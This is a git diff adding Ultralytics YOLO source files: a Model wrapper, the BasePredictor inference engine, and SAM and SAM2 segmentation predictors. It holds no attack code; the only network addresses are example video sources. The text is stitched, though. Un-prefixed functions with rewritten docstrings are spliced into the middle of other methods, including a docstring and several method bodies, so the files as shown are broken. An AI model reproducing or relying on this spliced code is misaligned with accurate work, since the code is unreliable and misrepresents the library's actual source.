k, v in args.items() if k in include} + + # def __getattr__(self, attr): + # """Raises error if object has no requested attribute.""" + # name = self.__class__.__name__ + # raise AttributeError(f"'{name}' object has no attribute '{attr}'. See valid attributes below.\n{self.__doc__}") + + def _smart_load(self, key: str): + """ + Loads the appropriate module based on the model task. 
+ + This method dynamically selects and returns the correct module (model, trainer, validator, or predictor) + based on the current task of the model and the provided key. It uses the task_map attribute to determine + the correct module to load. + + Args: + key (str): The type of module to load. Must be one of 'model', 'trainer', 'validator', or 'predictor'. + + Returns: + (object): The loaded module corresponding to the specified key and current task. + + Raises: + NotImplementedError: If the specified key is not supported for the current task. + + Examples: + >>> model = Model(task="detect") + >>> predictor = model._smart_load("predictor") + >>> trainer = model._smart_load("trainer") + + Notes: + - This method is typically used internally by other methods of the Model class. + - The task_map attribute should be properly initialized with the correct mappings for each task. + """ + try: + return self.task_map[self.task][key] + except Exception as e: + name = self.__class__.__name__ + mode = inspect.stack()[1][3] # get the function name. + raise NotImplementedError( + emojis(f"WARNING ⚠️ '{name}' model does not support '{mode}' mode for '{self.task}' task yet.") + ) from e + + @property + def task_map(self) -> dict: + """ + Provides a mapping from model tasks to corresponding classes for different modes. + + This property method returns a dictionary that maps each supported task (e.g., detect, segment, classify) + to a nested dictionary. The nested dictionary contains mappings for different operational modes + (model, trainer, validator, predictor) to their respective class implementations. + + The mapping allows for dynamic loading of appropriate classes based on the model's task and the + desired operational mode. This facilitates a flexible and extensible architecture for handling + various tasks and modes within the Ultralytics framework. 
    def eval(self):
        """
        Sets the wrapped model to evaluation mode.

        Calls `eval()` on `self.model` and returns this wrapper so that calls can be chained.

        Returns:
            (Model): This instance, after `self.model.eval()` has been called.

        Examples:
            >>> model = YOLO("yolo11n.pt")
            >>> model.eval()
        """
        self.model.eval()
        return self
+ + Examples: + >>> model = YOLO("yolo11n.pt") + >>> print(model.stride) + >>> print(model.task) + """ + if name == "model": + return self._modules["model"] + return getattr(self.model, name) diff --git a/2024.ultralytics/v8.3.46/engine/predictor.py b/2024.ultralytics/v8.3.46/engine/predictor.py new file mode 100644 index 0000000..c525016 --- /dev/null +++ b/2024.ultralytics/v8.3.46/engine/predictor.py @@ -0,0 +1,408 @@ +# Ultralytics YOLO 🚀, AGPL-3.0 license +""" +Run prediction on images, videos, directories, globs, YouTube, webcam, streams, etc. + +Usage - sources: + $ yolo mode=predict model=yolov8n.pt source=0 # webcam + img.jpg # image + vid.mp4 # video + screen # screenshot + path/ # directory + list.txt # list of images + list.streams # list of streams + 'path/*.jpg' # glob + 'https://youtu.be/LNwODJXcvt4' # YouTube + 'rtsp://example.com/media.mp4' # RTSP, RTMP, HTTP, TCP stream + +Usage - formats: + $ yolo mode=predict model=yolov8n.pt # PyTorch + yolov8n.torchscript # TorchScript + yolov8n.onnx # ONNX Runtime or OpenCV DNN with dnn=True + yolov8n_openvino_model # OpenVINO + yolov8n.engine # TensorRT + yolov8n.mlpackage # CoreML (macOS-only) + yolov8n_saved_model # TensorFlow SavedModel + yolov8n.pb # TensorFlow GraphDef + yolov8n.tflite # TensorFlow Lite + yolov8n_edgetpu.tflite # TensorFlow Edge TPU + yolov8n_paddle_model # PaddlePaddle + yolov8n.mnn # MNN + yolov8n_ncnn_model # NCNN +""" + +import platform +import re +import threading +from pathlib import Path + +import cv2 +import numpy as np +import torch + +from ultralytics.cfg import get_cfg, get_save_dir +from ultralytics.data import load_inference_source +from ultralytics.data.augment import LetterBox, classify_transforms +from ultralytics.nn.autobackend import AutoBackend +from ultralytics.utils import DEFAULT_CFG, LOGGER, MACOS, WINDOWS, callbacks, colorstr, ops +from ultralytics.utils.checks import check_imgsz, check_imshow +from ultralytics.utils.files import increment_path +from 
ultralytics.utils.torch_utils import select_device, smart_inference_mode + +STREAM_WARNING = """ +WARNING ⚠️ inference results will accumulate in RAM unless `stream=True` is passed, causing potential out-of-memory +errors for large sources or long-running streams and videos. See https://docs.ultralytics.com/modes/predict/ for help. + +Example: + results = model(source=..., stream=True) # generator of Results objects + for r in results: + boxes = r.boxes # Boxes object for bbox outputs + masks = r.masks # Masks object for segment masks outputs + probs = r.probs # Class probabilities for classification outputs +""" + + +class BasePredictor: + """ + BasePredictor. + + A base class for creating predictors. + + Attributes: + args (SimpleNamespace): Configuration for the predictor. + save_dir (Path): Directory to save results. + done_warmup (bool): Whether the predictor has finished setup. + model (nn.Module): Model used for prediction. + data (dict): Data configuration. + device (torch.device): Device used for prediction. + dataset (Dataset): Dataset used for prediction. + vid_writer (dict): Dictionary of {save_path: video_writer, ...} writer for saving video output. + """ + + def __init__(self, cfg=DEFAULT_CFG, overrides=None, _callbacks=None): + """ + Initializes the BasePredictor class. + + Args: + cfg (str, optional): Path to a configuration file. Defaults to DEFAULT_CFG. + overrides (dict, optional): Configuration overrides. Defaults to None. 
+ """ + self.args = get_cfg(cfg, overrides) + self.save_dir = get_save_dir(self.args) + if self.args.conf is None: + self.args.conf = 0.25 # default conf=0.25 + self.done_warmup = False + if self.args.show: + self.args.show = check_imshow(warn=True) + + # Usable if setup is done + self.model = None + self.data = self.args.data # data_dict + self.imgsz = None + self.device = None + self.dataset = None + self.vid_writer = {} # dict of {save_path: video_writer, ...} + self.plotted_img = None + self.source_type = None + self.seen = 0 + self.windows = [] + self.batch = None + self.results = None + self.transforms = None + self.callbacks = _callbacks or callbacks.get_default_callbacks() + self.txt_path = None + self._lock = threading.Lock() # for automatic thread-safe inference + callbacks.add_integration_callbacks(self) + + def preprocess(self, im): + """ + Prepares input image before inference. + + Args: + im (torch.Tensor | List(np.ndarray)): BCHW for tensor, [(HWC) x B] for list. + """ + not_tensor = not isinstance(im, torch.Tensor) + if not_tensor: + im = np.stack(self.pre_transform(im)) + im = im[..., ::-1].transpose((0, 3, 1, 2)) # BGR to RGB, BHWC to BCHW, (n, 3, h, w) + im = np.ascontiguousarray(im) # contiguous + im = torch.from_numpy(im) + + im = im.to(self.device) + im = im.half() if self.model.fp16 else im.float() # uint8 to fp16/32 + if not_tensor: + im /= 255 # 0 - 255 to 0.0 - 1.0 + return im + + def inference(self, im, *args, **kwargs): + """Runs inference on a given image using the specified model and arguments.""" + visualize = ( + increment_path(self.save_dir / Path(self.batch[0][0]).stem, mkdir=True) + if self.args.visualize and (not self.source_type.tensor) + else False + ) + return self.model(im, augment=self.args.augment, visualize=visualize, embed=self.args.embed, *args, **kwargs) + + def pre_transform(self, im): + """ + Pre-transform input image before inference. 
+ + Args: + im (List(np.ndarray)): (N, 3, h, w) for tensor, [(h, w, 3) x N] for list. + + Returns: + (list): A list of transformed images. + """ + same_shapes = len({x.shape for x in im}) == 1 + letterbox = LetterBox( + self.imgsz, + auto=same_shapes and (self.model.pt or (getattr(self.model, "dynamic", False) and not self.model.imx)), + stride=self.model.stride, + ) + return [letterbox(image=x) for x in im] + + def postprocess(self, preds, img, orig_imgs): + """Post-processes predictions for an image and returns them.""" + return preds + + def __call__(self, source=None, model=None, stream=False, *args, **kwargs): + """Performs inference on an image or stream.""" + self.stream = stream + if stream: + return self.stream_inference(source, model, *args, **kwargs) + else: + return list(self.stream_inference(source, model, *args, **kwargs)) # merge list of Result into one + + def predict_cli(self, source=None, model=None): + """ + Method used for Command Line Interface (CLI) prediction. + + This function is designed to run predictions using the CLI. It sets up the source and model, then processes + the inputs in a streaming manner. This method ensures that no outputs accumulate in memory by consuming the + generator without storing results. + + Note: + Do not modify this function or remove the generator. The generator ensures that no outputs are + accumulated in memory, which is critical for preventing memory issues during long-running predictions. 
+ """ + gen = self.stream_inference(source, model) + for _ in gen: # sourcery skip: remove-empty-nested-block, noqa + pass + + def setup_source(self, source): + """Sets up source and inference mode.""" + self.imgsz = check_imgsz(self.args.imgsz, stride=self.model.stride, min_dim=2) # check image size + self.transforms = ( + getattr( + self.model.model, + "transforms", + classify_transforms(self.imgsz[0], crop_fraction=self.args.crop_fraction), + ) + if self.args.task == "classify" + else None + ) + self.dataset = load_inference_source( + source=source, + batch=self.args.batch, + vid_stride=self.args.vid_stride, + buffer=self.args.stream_buffer, + ) + self.source_type = self.dataset.source_type + if not getattr(self, "stream", True) and ( + self.source_type.stream + or self.source_type.screenshot + or len(self.dataset) > 1000 # many images + or any(getattr(self.dataset, "video_flag", [False])) + ): # videos + LOGGER.warning(STREAM_WARNING) + self.vid_writer = {} + + @smart_inference_mode() + def stream_inference(self, source=None, model=None, *args, **kwargs): + """Streams real-time inference on camera feed and saves results to file.""" + if self.args.verbose: + LOGGER.info("") + + # Setup model + if not self.model: + self.setup_model(model) + + with self._lock: # for thread-safe inference + # Setup source every time predict is called + self.setup_source(source if source is not None else self.args.source) + + # Check if save_dir/ label file exists + if self.args.save or self.args.save_txt: + (self.save_dir / "labels" if self.args.save_txt else self.save_dir).mkdir(parents=True, exist_ok=True) + + # Warmup model + if not self.done_warmup: + self.model.warmup(imgsz=(1 if self.model.pt or self.model.triton else self.dataset.bs, 3, *self.imgsz)) + self.done_warmup = True + + self.seen, self.windows, self.batch = 0, [], None + profilers = ( + ops.Profile(device=self.device), + ops.Profile(device=self.device), + ops.Profile(device=self.device), + ) + 
self.run_callbacks("on_predict_start") + for self.batch in self.dataset: + self.run_callbacks("on_predict_batch_start") + paths, im0s, s = self.batch + + # Preprocess + with profilers[0]: + im = self.preprocess(im0s) + + # Inference + with profilers[1]: + preds = self.inference(im, *args, **kwargs) + if self.args.embed: + yield from [preds] if isinstance(preds, torch.Tensor) else preds # yield embedding tensors + continue + + # Postprocess + with profilers[2]: + self.results = self.postprocess(preds, im, im0s) + self.run_callbacks("on_predict_postprocess_end") + + # Visualize, save, write results + n = len(im0s) + for i in range(n): + self.seen += 1 + self.results[i].speed = { + "preprocess": profilers[0].dt * 1e3 / n, + "inference": profilers[1].dt * 1e3 / n, + "postprocess": profilers[2].dt * 1e3 / n, + } + if self.args.verbose or self.args.save or self.args.save_txt or self.args.show: + s[i] += self.write_results(i, Path(paths[i]), im, s) + + # Print batch results + if self.args.verbose: + LOGGER.info("\n".join(s)) + + self.run_callbacks("on_predict_batch_end") + yield from self.results + + # Release assets + for v in self.vid_writer.values(): + if isinstance(v, cv2.VideoWriter): + v.release() + + # Print final results + if self.args.verbose and self.seen: + t = tuple(x.t / self.seen * 1e3 for x in profilers) # speeds per image + LOGGER.info( + f"Speed: %.1fms preprocess, %.1fms inference, %.1fms postprocess per image at shape " + f"{(min(self.args.batch, self.seen), 3, *im.shape[2:])}" % t + ) + if self.args.save or self.args.save_txt or self.args.save_crop: + nl = len(list(self.save_dir.glob("labels/*.txt"))) # number of labels + s = f"\n{nl} label{'s' * (nl > 1)} saved to {self.save_dir / 'labels'}" if self.args.save_txt else "" + LOGGER.info(f"Results saved to {colorstr('bold', self.save_dir)}{s}") + self.run_callbacks("on_predict_end") + + def setup_model(self, model, verbose=True): + """Initialize YOLO model with given parameters and set it to evaluation 
def save_predicted_images(self, save_path="", frame=0):
    """
    Write the most recently plotted image to disk as a video frame or a still image.

    For "stream" and "video" datasets the frame is appended to a video writer that is created on first use and
    cached in `self.vid_writer` under `save_path`. When `self.args.save_frames` is set, every frame is also
    written as a JPG into a sibling "<name>_frames" directory. Any other dataset mode saves a single JPG.

    Args:
        save_path (str): Output path; its suffix is replaced by the container or image suffix actually used.
        frame (int): Frame number used to name the per-frame JPG when frames are saved.
    """
    im = self.plotted_img
    target = Path(save_path)

    # Save images
    if self.dataset.mode not in {"stream", "video"}:
        cv2.imwrite(str(target.with_suffix(".jpg")), im)  # save to JPG for best support
        return

    # Save videos and streams
    fps = self.dataset.fps if self.dataset.mode == "video" else 30
    # Strip extensions from the file name only. Splitting the whole path at its first "." would truncate
    # it inside a dotted directory name (e.g. "runs/v1.2/predict/clip.mp4") or at a leading "./".
    frames_dir = target.parent / f"{target.name.split('.', 1)[0]}_frames"

    if save_path not in self.vid_writer:  # new video
        if self.args.save_frames:
            frames_dir.mkdir(parents=True, exist_ok=True)
        suffix, fourcc = (".mp4", "avc1") if MACOS else (".avi", "WMV2") if WINDOWS else (".avi", "MJPG")
        self.vid_writer[save_path] = cv2.VideoWriter(
            filename=str(target.with_suffix(suffix)),
            fourcc=cv2.VideoWriter_fourcc(*fourcc),
            fps=fps,  # integer required, floats produce error in MP4 codec
            frameSize=(im.shape[1], im.shape[0]),  # (width, height)
        )

    # Save video
    self.vid_writer[save_path].write(im)
    if self.args.save_frames:
        cv2.imwrite(str(frames_dir / f"{frame}.jpg"), im)
+ +SAM is an advanced image segmentation model offering features like promptable segmentation and zero-shot performance. +This module contains the implementation of the prediction logic and auxiliary utilities required to perform segmentation +using SAM. It forms an integral part of the Ultralytics framework and is designed for high-performance, real-time image +segmentation tasks. +""" + +from collections import OrderedDict + +import numpy as np +import torch +import torch.nn.functional as F + +from ultralytics.data.augment import LetterBox +from ultralytics.engine.predictor import BasePredictor +from ultralytics.engine.results import Results +from ultralytics.utils import DEFAULT_CFG, ops +from ultralytics.utils.torch_utils import select_device, smart_inference_mode + +from .amg import ( + batch_iterator, + batched_mask_to_box, + build_all_layer_point_grids, + calculate_stability_score, + generate_crop_boxes, + is_box_near_crop_edge, + remove_small_regions, + uncrop_boxes_xyxy, + uncrop_masks, +) +from .build import build_sam + + +class Predictor(BasePredictor): + """ + Predictor class for SAM, enabling real-time image segmentation with promptable capabilities. + + This class extends BasePredictor and implements the Segment Anything Model (SAM) for advanced image + segmentation tasks. It supports various input prompts like points, bounding boxes, and masks for + fine-grained control over segmentation results. + + Attributes: + args (SimpleNamespace): Configuration arguments for the predictor. + model (torch.nn.Module): The loaded SAM model. + device (torch.device): The device (CPU or GPU) on which the model is loaded. + im (torch.Tensor): The preprocessed input image. + features (torch.Tensor): Extracted image features. + prompts (Dict): Dictionary to store various types of prompts (e.g., bboxes, points, masks). + segment_all (bool): Flag to indicate if full image segmentation should be performed. + mean (torch.Tensor): Mean values for image normalization. 
def __init__(self, cfg=DEFAULT_CFG, overrides=None, _callbacks=None):
    """
    Initialize the SAM Predictor with configuration, overrides, and callbacks.

    The task, mode and batch size are always forced to "segment", "predict" and 1, regardless of what
    `overrides` contains. `retina_masks` is switched on after the base initializer has run.

    Args:
        cfg (Dict): Configuration containing default settings.
        overrides (Dict | None): Values that override the default configuration. The dict passed in is
            left untouched; the forced SAM settings are applied to a copy.
        _callbacks (Dict | None): Callback functions to customize behavior.

    Examples:
        >>> predictor = Predictor(cfg=DEFAULT_CFG)
        >>> predictor = Predictor(overrides={"imgsz": 640})
        >>> predictor = Predictor(_callbacks={"on_predict_start": custom_callback})
    """
    # Build a fresh dict so a caller-owned `overrides` (possibly reused elsewhere) is never mutated
    overrides = {**(overrides or {}), "task": "segment", "mode": "predict", "batch": 1}
    super().__init__(cfg, overrides, _callbacks)
    self.args.retina_masks = True
    self.im = None  # cached preprocessed image, returned as-is by `preprocess` when set
    self.features = None  # cached image features
    self.prompts = {}  # prompts stored for the next inference call
    self.segment_all = False  # True while running prompt-free (segment everything) inference
def inference(self, im, bboxes=None, points=None, labels=None, masks=None, multimask_output=False, *args, **kwargs):
    """
    Run segmentation on the preprocessed image, dispatching on whether any prompt is available.

    Prompts stored in `self.prompts` take precedence over the matching arguments and are consumed (popped)
    by this call. When no box, point or mask prompt is left, the whole image is segmented via `generate`;
    otherwise the prompts are forwarded to `prompt_inference`.

    Args:
        im (torch.Tensor): The preprocessed input image in tensor format, with shape (N, C, H, W).
        bboxes (np.ndarray | List | None): Bounding boxes with shape (N, 4), in XYXY format.
        points (np.ndarray | List | None): Points indicating object locations with shape (N, 2), in pixels.
        labels (np.ndarray | List | None): Labels for point prompts, shape (N,). 1 = foreground, 0 = background.
        masks (np.ndarray | None): Low-resolution masks from previous predictions, shape (N, H, W).
        multimask_output (bool): Flag to return multiple masks. Only used for prompt-based inference.
        *args (Any): Extra positional arguments, forwarded to `generate` only.
        **kwargs (Any): Extra keyword arguments, forwarded to `generate` only.

    Returns:
        (tuple): Whatever `prompt_inference` returns when a prompt is present, otherwise the output of
            `generate`.

    Examples:
        >>> predictor = Predictor()
        >>> predictor.setup_model(model_path="sam_model.pt")
        >>> predictor.set_image("image.jpg")
        >>> masks, scores = predictor.inference(im, bboxes=[[0, 0, 100, 100]])
    """
    # Stored prompts win over call arguments and are removed once used
    stored = self.prompts
    bboxes = stored.pop("bboxes", bboxes)
    points = stored.pop("points", points)
    masks = stored.pop("masks", masks)
    labels = stored.pop("labels", labels)

    # Labels alone do not count as a prompt
    has_prompt = bboxes is not None or points is not None or masks is not None
    if has_prompt:
        return self.prompt_inference(im, bboxes, points, labels, masks, multimask_output)

    return self.generate(im, *args, **kwargs)
+ (np.ndarray): Quality scores predicted by the model for each mask, with length C. + + Examples: + >>> predictor = Predictor() + >>> im = torch.rand(1, 3, 1024, 1024) + >>> bboxes = [[100, 100, 200, 200]] + >>> masks, scores, logits = predictor.prompt_inference(im, bboxes=bboxes) + """ + features = self.get_im_features(im) if self.features is None else self.features + + bboxes, points, labels, masks = self._prepare_prompts(im.shape[2:], bboxes, points, labels, masks) + points = (points, labels) if points is not None else None + # Embed prompts + sparse_embeddings, dense_embeddings = self.model.prompt_encoder(points=points, boxes=bboxes, masks=masks) + + # Predict masks + pred_masks, pred_scores = self.model.mask_decoder( + image_embeddings=features, + image_pe=self.model.prompt_encoder.get_dense_pe(), + sparse_prompt_embeddings=sparse_embeddings, + dense_prompt_embeddings=dense_embeddings, + multimask_output=multimask_output, + ) + + # (N, d, H, W) --> (N*d, H, W), (N, d) --> (N*d, ) + # `d` could be 1 or 3 depends on `multimask_output`. + return pred_masks.flatten(0, 1), pred_scores.flatten(0, 1) + + def _prepare_prompts(self, dst_shape, bboxes=None, points=None, labels=None, masks=None): + """ + Prepares and transforms the input prompts for processing based on the destination shape. + + Args: + dst_shape (tuple): The target shape (height, width) for the prompts. + bboxes (np.ndarray | List | None): Bounding boxes in XYXY format with shape (N, 4). + points (np.ndarray | List | None): Points indicating object locations with shape (N, 2) or (N, num_points, 2), in pixels. + labels (np.ndarray | List | None): Point prompt labels with shape (N,) or (N, num_points). 1 for foreground, 0 for background. + masks (List | np.ndarray, Optional): Masks for the objects, where each mask is a 2D array. + + Raises: + AssertionError: If the number of points don't match the number of labels, in case labels were passed. 
+ + Returns: + (tuple): A tuple containing transformed bounding boxes, points, labels, and masks. + """ + src_shape = self.batch[1][0].shape[:2] + r = 1.0 if self.segment_all else min(dst_shape[0] / src_shape[0], dst_shape[1] / src_shape[1]) + # Transform input prompts + if points is not None: + points = torch.as_tensor(points, dtype=torch.float32, device=self.device) + points = points[None] if points.ndim == 1 else points + # Assuming labels are all positive if users don't pass labels. + if labels is None: + labels = np.ones(points.shape[:-1]) + labels = torch.as_tensor(labels, dtype=torch.int32, device=self.device) + assert ( + points.shape[-2] == labels.shape[-1] + ), f"Number of points {points.shape[-2]} should match number of labels {labels.shape[-1]}." + points *= r + if points.ndim == 2: + # (N, 2) --> (N, 1, 2), (N, ) --> (N, 1) + points, labels = points[:, None, :], labels[:, None] + if bboxes is not None: + bboxes = torch.as_tensor(bboxes, dtype=torch.float32, device=self.device) + bboxes = bboxes[None] if bboxes.ndim == 1 else bboxes + bboxes *= r + if masks is not None: + masks = torch.as_tensor(masks, dtype=torch.float32, device=self.device).unsqueeze(1) + return bboxes, points, labels, masks + + def generate( + self, + im, + crop_n_layers=0, + crop_overlap_ratio=512 / 1500, + crop_downscale_factor=1, + point_grids=None, + points_stride=32, + points_batch_size=64, + conf_thres=0.88, + stability_score_thresh=0.95, + stability_score_offset=0.95, + crop_nms_thresh=0.7, + ): + """ + Perform image segmentation using the Segment Anything Model (SAM). + + This method segments an entire image into constituent parts by leveraging SAM's advanced architecture + and real-time performance capabilities. It can optionally work on image crops for finer segmentation. + + Args: + im (torch.Tensor): Input tensor representing the preprocessed image with shape (N, C, H, W). + crop_n_layers (int): Number of layers for additional mask predictions on image crops. 
+ crop_overlap_ratio (float): Overlap between crops, scaled down in subsequent layers. + crop_downscale_factor (int): Scaling factor for sampled points-per-side in each layer. + point_grids (List[np.ndarray] | None): Custom grids for point sampling normalized to [0,1]. + points_stride (int): Number of points to sample along each side of the image. + points_batch_size (int): Batch size for the number of points processed simultaneously. + conf_thres (float): Confidence threshold [0,1] for filtering based on mask quality prediction. + stability_score_thresh (float): Stability threshold [0,1] for mask filtering based on stability. + stability_score_offset (float): Offset value for calculating stability score. + crop_nms_thresh (float): IoU cutoff for NMS to remove duplicate masks between crops. + + Returns: + pred_masks (torch.Tensor): Segmented masks with shape (N, H, W). + pred_scores (torch.Tensor): Confidence scores for each mask with shape (N,). + pred_bboxes (torch.Tensor): Bounding boxes for each mask with shape (N, 4). 
+ + Examples: + >>> predictor = Predictor() + >>> im = torch.rand(1, 3, 1024, 1024) # Example input image + >>> masks, scores, boxes = predictor.generate(im) + """ + import torchvision # scope for faster 'import ultralytics' + + self.segment_all = True + ih, iw = im.shape[2:] + crop_regions, layer_idxs = generate_crop_boxes((ih, iw), crop_n_layers, crop_overlap_ratio) + if point_grids is None: + point_grids = build_all_layer_point_grids(points_stride, crop_n_layers, crop_downscale_factor) + pred_masks, pred_scores, pred_bboxes, region_areas = [], [], [], [] + for crop_region, layer_idx in zip(crop_regions, layer_idxs): + x1, y1, x2, y2 = crop_region + w, h = x2 - x1, y2 - y1 + area = torch.tensor(w * h, device=im.device) + points_scale = np.array([[w, h]]) # w, h + # Crop image and interpolate to input size + crop_im = F.interpolate(im[..., y1:y2, x1:x2], (ih, iw), mode="bilinear", align_corners=False) + # (num_points, 2) + points_for_image = point_grids[layer_idx] * points_scale + crop_masks, crop_scores, crop_bboxes = [], [], [] + for (points,) in batch_iterator(points_batch_size, points_for_image): + pred_mask, pred_score = self.prompt_inference(crop_im, points=points, multimask_output=True) + # Interpolate predicted masks to input size + pred_mask = F.interpolate(pred_mask[None], (h, w), mode="bilinear", align_corners=False)[0] + idx = pred_score > conf_thres + pred_mask, pred_score = pred_mask[idx], pred_score[idx] + + stability_score = calculate_stability_score( + pred_mask, self.model.mask_threshold, stability_score_offset + ) + idx = stability_score > stability_score_thresh + pred_mask, pred_score = pred_mask[idx], pred_score[idx] + # Bool type is much more memory-efficient. 
def setup_model(self, model=None, verbose=True):
    """
    Initialize the Segment Anything Model (SAM) for inference.

    Puts the model in eval mode on the selected device, stores the per-channel normalization constants used
    by `preprocess`, and sets the attributes the base predictor expects on a model.

    Args:
        model (torch.nn.Module | None): A pretrained SAM model. If None, one is built via `get_model`.
        verbose (bool): Passed to `select_device`.

    Examples:
        >>> predictor = Predictor()
        >>> predictor.setup_model(model=sam_model, verbose=True)
    """
    device = select_device(self.args.device, verbose=verbose)
    net = self.get_model() if model is None else model
    net.eval()
    self.model = net.to(device)
    self.device = device

    # Per-channel normalization constants, shaped (3, 1, 1) to broadcast over CHW images
    for attr, channel_values in (
        ("mean", [123.675, 116.28, 103.53]),
        ("std", [58.395, 57.12, 57.375]),
    ):
        setattr(self, attr, torch.tensor(channel_values).view(-1, 1, 1).to(device))

    # Ultralytics compatibility settings
    for attr, value in (("pt", False), ("triton", False), ("stride", 32), ("fp16", False)):
        setattr(self.model, attr, value)
    self.done_warmup = True
def setup_source(self, source):
    """
    Set up the data source for inference, unless no source is given.

    Delegates to the base predictor's `setup_source` when `source` is not None. A None source is a no-op:
    nothing is configured and any previously prepared dataset is left as it is.

    Args:
        source (str | Path | None): The image data source forwarded to the base implementation, or None
            to skip setup.

    Examples:
        >>> predictor = Predictor()
        >>> predictor.setup_source("path/to/images")
        >>> predictor.setup_source("video.mp4")
        >>> predictor.setup_source(None)  # does nothing
    """
    if source is None:
        return
    super().setup_source(source)
+ for batch in self.dataset: + im = self.preprocess(batch[1]) + self.features = self.get_im_features(im) + break + + def get_im_features(self, im): + """Extracts image features using the SAM model's image encoder for subsequent mask prediction.""" + assert ( + isinstance(self.imgsz, (tuple, list)) and self.imgsz[0] == self.imgsz[1] + ), f"SAM models only support square image size, but got {self.imgsz}." + self.model.set_imgsz(self.imgsz) + return self.model.image_encoder(im) + + def set_prompts(self, prompts): + """Sets prompts for subsequent inference operations.""" + self.prompts = prompts + + def reset_image(self): + """Resets the current image and its features, clearing them for subsequent inference.""" + self.im = None + self.features = None + + @staticmethod + def remove_small_regions(masks, min_area=0, nms_thresh=0.7): + """ + Remove small disconnected regions and holes from segmentation masks. + + This function performs post-processing on segmentation masks generated by the Segment Anything Model (SAM). + It removes small disconnected regions and holes from the input masks, and then performs Non-Maximum + Suppression (NMS) to eliminate any newly created duplicate boxes. + + Args: + masks (torch.Tensor): Segmentation masks to be processed, with shape (N, H, W) where N is the number of + masks, H is height, and W is width. + min_area (int): Minimum area threshold for removing disconnected regions and holes. Regions smaller than + this will be removed. + nms_thresh (float): IoU threshold for the NMS algorithm to remove duplicate boxes. + + Returns: + new_masks (torch.Tensor): Processed masks with small regions removed, shape (N, H, W). + keep (List[int]): Indices of remaining masks after NMS, for filtering corresponding boxes. 
+ + Examples: + >>> masks = torch.rand(5, 640, 640) > 0.5 # 5 random binary masks + >>> new_masks, keep = remove_small_regions(masks, min_area=100, nms_thresh=0.7) + >>> print(f"Original masks: {masks.shape}, Processed masks: {new_masks.shape}") + >>> print(f"Indices of kept masks: {keep}") + """ + import torchvision # scope for faster 'import ultralytics' + + if len(masks) == 0: + return masks + + # Filter small disconnected regions and holes + new_masks = [] + scores = [] + for mask in masks: + mask = mask.cpu().numpy().astype(np.uint8) + mask, changed = remove_small_regions(mask, min_area, mode="holes") + unchanged = not changed + mask, changed = remove_small_regions(mask, min_area, mode="islands") + unchanged = unchanged and not changed + + new_masks.append(torch.as_tensor(mask).unsqueeze(0)) + # Give score=0 to changed masks and 1 to unchanged masks so NMS prefers masks not needing postprocessing + scores.append(float(unchanged)) + + # Recalculate boxes and remove any new duplicates + new_masks = torch.cat(new_masks, dim=0) + boxes = batched_mask_to_box(new_masks) + keep = torchvision.ops.nms(boxes.float(), torch.as_tensor(scores), nms_thresh) + + return new_masks[keep].to(device=masks.device, dtype=masks.dtype), keep + + +class SAM2Predictor(Predictor): + """ + SAM2Predictor class for advanced image segmentation using Segment Anything Model 2 architecture. + + This class extends the base Predictor class to implement SAM2-specific functionality for image + segmentation tasks. It provides methods for model initialization, feature extraction, and + prompt-based inference. + + Attributes: + _bb_feat_sizes (List[Tuple[int, int]]): Feature sizes for different backbone levels. + model (torch.nn.Module): The loaded SAM2 model. + device (torch.device): The device (CPU or GPU) on which the model is loaded. + features (Dict[str, torch.Tensor]): Cached image features for efficient inference. + segment_all (bool): Flag to indicate if all segments should be predicted. 
def prompt_inference(
    self,
    im,
    bboxes=None,
    points=None,
    labels=None,
    masks=None,
    multimask_output=False,
    img_idx=-1,
):
    """
    Run prompt-based segmentation with the SAM2 prompt encoder and mask decoder.

    Cached `self.features` are reused when present; otherwise features are extracted from `im`. Prompts are
    normalized by `self._prepare_prompts`, which returns boxes already merged into the point prompts, so the
    prompt encoder is always called with `boxes=None`.

    Args:
        im (torch.Tensor): Preprocessed input image tensor with shape (N, C, H, W).
        bboxes (np.ndarray | List[List[float]] | None): Bounding boxes in XYXY format with shape (N, 4).
        points (np.ndarray | List[List[float]] | None): Object location points with shape (N, 2), in pixels.
        labels (np.ndarray | List[int] | None): Point prompt labels with shape (N,). 1 = foreground, 0 = background.
        masks (np.ndarray | None): Low-resolution masks from previous predictions with shape (N, H, W).
        multimask_output (bool): Flag to return multiple masks for ambiguous prompts.
        img_idx (int): Index into the cached features selecting which image to decode.

    Returns:
        pred_masks: Decoder masks with the first two dimensions flattened, (N, d, H, W) --> (N*d, H, W).
        pred_scores: Decoder scores flattened the same way, (N, d) --> (N*d,).

    Examples:
        >>> predictor = SAM2Predictor(cfg)
        >>> image = torch.rand(1, 3, 640, 640)
        >>> bboxes = [[100, 100, 200, 200]]
        >>> masks, scores = predictor.prompt_inference(image, bboxes=bboxes)
        >>> print(f"Generated {masks.shape[0]} masks with average score {scores.mean():.2f}")
    """
    feats = self.features
    if feats is None:
        feats = self.get_im_features(im)

    pts, lbls, masks = self._prepare_prompts(im.shape[2:], bboxes, points, labels, masks)
    point_prompt = None if pts is None else (pts, lbls)

    prompt_encoder = self.model.sam_prompt_encoder
    sparse, dense = prompt_encoder(points=point_prompt, boxes=None, masks=masks)

    # More than one prompt row means multi-object prediction: the decoder must repeat the image embedding
    multi_object = point_prompt is not None and point_prompt[0].shape[0] > 1
    # Keep a leading batch dimension of 1 for the selected image at every feature level
    high_res = [level[img_idx].unsqueeze(0) for level in feats["high_res_feats"]]
    image_embed = feats["image_embed"][img_idx].unsqueeze(0)

    # Predict masks
    pred_masks, pred_scores, _, _ = self.model.sam_mask_decoder(
        image_embeddings=image_embed,
        image_pe=prompt_encoder.get_dense_pe(),
        sparse_prompt_embeddings=sparse,
        dense_prompt_embeddings=dense,
        multimask_output=multimask_output,
        repeat_image=multi_object,
        high_res_features=high_res,
    )

    # `d` could be 1 or 3 depends on `multimask_output`.
    flat_masks = pred_masks.flatten(0, 1)
    flat_scores = pred_scores.flatten(0, 1)
    return flat_masks, flat_scores
